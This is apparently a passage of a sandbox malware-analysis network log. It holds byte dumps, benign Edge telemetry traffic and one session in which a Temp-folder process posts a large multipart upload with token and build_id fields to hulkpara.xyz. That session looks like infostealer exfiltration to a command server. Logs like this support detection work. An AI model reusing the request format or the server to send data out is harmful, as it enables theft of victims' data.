                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:02 UTC717OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:04 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:04 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:04 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          29192.168.2.74980520.110.205.1194431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:04 UTC1175OUTGET /c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0 HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: c.msn.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          Cookie: _C_ETH=1; USRLOC=; MUID=08F1B41B03E76B2C0A73A14102FE6A7B; _EDGE_S=F=1&SID=1A9F6908BECB617B0DA87C52BF7E6078; _EDGE_V=1
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:04 UTC1108INHTTP/1.1 302 Redirect
                                                                                                                                                                                                                                                                                          Cache-Control: private, no-cache, proxy-revalidate, no-store
                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                          Location: https://c.bing.com/c.gif?rnd=1734597969347&udc=true&pg.n=default&pg.t=dhp&pg.c=547&pg.p=anaheim&rf=&tp=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2520tab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp&cvs=Browser&di=340&st.dpt=&st.sdpt=antp&subcvs=homepage&lng=en-us&rid=c87c0c2827f044b19e1956450ca6519b&activityId=c87c0c2827f044b19e1956450ca6519b&d.imd=false&scr=1280x1024&anoncknm=app_anon&issso=&aadState=0&ctsa=mr&CtsSyncId=267493DD80724C64AC29441BD36923AF&RedC=c.msn.com&MXFR=08F1B41B03E76B2C0A73A14102FE6A7B
                                                                                                                                                                                                                                                                                          Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                                                          X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                                                          P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
                                                                                                                                                                                                                                                                                          Set-Cookie: SM=T; domain=c.msn.com; path=/; SameSite=None; Secure;
                                                                                                                                                                                                                                                                                          Set-Cookie: MUID=08F1B41B03E76B2C0A73A14102FE6A7B; domain=.msn.com; expires=Tue, 13-Jan-2026 07:14:04 GMT; path=/; SameSite=None; Secure; Priority=High;
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:04 GMT
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Content-Length: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          30192.168.2.749812108.139.47.1084431504C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:04 UTC925OUTGET /b?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sb.scorecardresearch.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          Accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                          Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:04 UTC955INHTTP/1.1 302 Found
                                                                                                                                                                                                                                                                                          Content-Length: 0
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Date: Thu, 19 Dec 2024 07:14:04 GMT
                                                                                                                                                                                                                                                                                          Location: /b2?rn=1734597969348&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fntp.msn.com%2Fedge%2Fntp%3Flocale%3Den-GB%26title%3DNew%2Btab%26dsp%3D1%26sp%3DBing%26isFREModalBackground%3D1%26startpage%3D1%26PC%3DU531%26ocid%3Dmsedgdhp%26mkt%3Den-us&c8=New+tab&c9=&cs_fpid=08F1B41B03E76B2C0A73A14102FE6A7B&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                                                                                                                                                                                                                                          set-cookie: UID=1D5eb283802c974f6e27c9d1734592444; SameSite=None; Secure; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                          set-cookie: XID=1D5eb283802c974f6e27c9d1734592444; SameSite=None; Secure; Partitioned; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                                                                                                                                                                                                                                          Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                                                                                                                                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                                                                                                                                                                                          Via: 1.1 5b4b6c6517b988a4ff2c794e5583ee02.cloudfront.net (CloudFront)
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Pop: JFK50-P1
                                                                                                                                                                                                                                                                                          X-Amz-Cf-Id: 8dJZNWvx24-fCLUIMBBknTAUPyyiU7E8CRISy4_2rpfZidZy6UEI8A==


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          31192.168.2.74983294.130.191.1684437416C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC328OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                          Content-Type: multipart/form-data; boundary=----FCB1VK689RQIEUAIMOPZ
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                          Host: hulkpara.xyz
                                                                                                                                                                                                                                                                                          Content-Length: 6990993
                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 66 32 34 63 61 32 36 61 66 31 64 63 32 32 39 39 33 37 65 36 33 39 36 66 32 31 32 62 37 31 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 46 43 42 31 56 4b 36 38 39 52 51 49 45 55 41 49 4d 4f 50 5a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                          Data Ascii: ------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="token"cf24ca26af1dc229937e6396f212b71d------FCB1VK689RQIEUAIMOPZContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------FCB1VK689RQIEUAIMOPZCont
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                          2024-12-19 07:14:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                          Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
